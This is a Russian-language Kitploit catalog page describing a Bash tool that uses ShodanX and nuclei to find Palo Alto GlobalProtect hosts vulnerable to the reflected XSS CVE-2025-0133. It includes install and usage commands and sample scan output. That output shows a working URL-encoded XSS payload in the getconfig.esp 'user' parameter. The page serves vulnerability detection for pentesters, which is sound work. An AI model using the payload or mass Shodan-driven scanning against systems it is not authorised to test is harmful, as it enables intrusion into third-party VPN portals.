Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-0133 — Обнаружена уязвимость Reflected XSS в Palo Alto GlobalProtect Gateway & Portal. Злоумышленники могут внедрять вредоносные скрипты через специально созданные запросы. | Kitploit
Инструменты/GitHubGitHub/inteleon404/cve-2025-0133
РазведкаСканеры уязвимостейСканеры веб-уязвимостейЭксплуатацияВеб-безопасностьТестирование на Проникновение
GitHubinteleon404/cve-2025-0133

CVE-2025-0133

Обнаружена уязвимость Reflected XSS в Palo Alto GlobalProtect Gateway & Portal. Злоумышленники могут внедрять вредоносные скрипты через специально созданные запросы.

Репозиторий
1021 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Сканер уязвимости CVE-2025-0133

Автоматизированный инструмент сканирования на Bash для обнаружения уязвимости CVE-2025-0133 (Reflected XSS) в Palo Alto GlobalProtect Gateway & Portal с использованием nuclei и shodanx.


Автор:

Дата: 23.06.2025
Серьёзность: Средняя
ID CVE: CVE-2025-0133
Тип уязвимости: Отражённый межсайтовый скриптинг (XSS)
Протестировано на: Palo Alto Networks GlobalProtect Portal (PAN-OS)


Обзор

Этот инструмент помогает пентестерам и исследователям безопасности быстро выявлять уязвимые домены или IP-адреса, связанные с CVE-2025-0133.
В нём используются шаблоны nuclei и интеграция с Shodan (shodanx) для эффективного поиска и сканирования целей.


Возможности

  • Автоматически определяет, является ли ввод отдельным доменом или файлом с несколькими доменами/IP
  • Запускает shodanx для отдельных доменов, чтобы собрать связанные хосты
  • Использует nuclei с пользовательским шаблоном CVE-2025-0133 для сканирования целей
  • Выводит результаты сканирования в чистом табличном виде в командной строке
  • Показывает время начала и окончания сканирования
  • Предлагает сохранить результаты в форматах .txt и .json
  • Встроенная справка и инструкции по использованию

Требования

  • Среда Linux с оболочкой Bash
  • nuclei установлен и доступен в $PATH
  • shodanx установлен и настроен
  • Файл шаблона nuclei для CVE-2025-0133 расположен по пути:
    /home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml (при необходимости измените путь)

📦 Установка необходимых инструментов

🔹 1. Установка ShodanX

root@kitploit:~
pip install git+https://github.com/RevoltSecurities/ShodanX 

Если появляется ошибка: "error: externally-managed-environment"

root@kitploit:~
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages

⚠️ Примечание: Параметр --break-system-packages может потребоваться в некоторых системах (особенно Debian/Ubuntu), чтобы разрешить pip установку пакетов вне виртуального окружения без ошибок прав доступа.

👉 Убедитесь, что shodanx доступен в $PATH. Проверьте командой:

root@kitploit:~
shodanx -h

🔹 2. Установка Nuclei

root@kitploit:~
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

Проверьте установку:

root@kitploit:~
nuclei -version

Затем обновите шаблоны:

root@kitploit:~
nuclei -update-templates

Использование

root@kitploit:~
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h 
Использование: ./cve20250133.sh <домен-или-файл>

Сканирование уязвимости CVE-2025-0133 с помощью nuclei и shodanx.
Если ввод — файл, сканировать домены/IP из файла.
Если ввод — домен, запустить shodanx для поиска связанных IP/доменов и просканировать их.

Параметры:
  -h, --help, help     Показать это сообщение справки и выйти.


Примеры

Сканирование одного домена

root@kitploit:~
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Время начала сканирования: 2025-06-24 16:33:51


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Ввод — один домен: domain.com — сначала запускаем ShodanX
     _                               _      
    | |            |                (_\  /  
 ,  | |     __   __|   __,   _  _      \/   
/ \_|/ \   /  \_/  |  /  |  / |/ |     /\   
 \/ |   |_/\__/ \_/|_/\_/|_/  |  |_/ _/  \_/
                                            
                                            

                     - RevoltSecurities

[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------

Сканирование из файла

root@kitploit:~
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt       
Время начала сканирования: 2025-06-24 16:36:37


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Ввод — файл: file.txt — пропускаем ShodanX
[*] Scanning domain 123.45.67.890 ...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------

Детали CVE-2025-0133

Уязвимость отражённого межсайтового скриптинга (XSS) в Palo Alto GlobalProtect Gateway & Portal, позволяющая злоумышленникам внедрять вредоносные скрипты через специально сформированные запросы. Для устранения этой проблемы обновите свои системы до последних версий Palo Alto Networks.


Лицензия

Этот проект лицензирован на условиях лицензии MIT — подробнее см. в файле LICENSE.

Скачать инструмент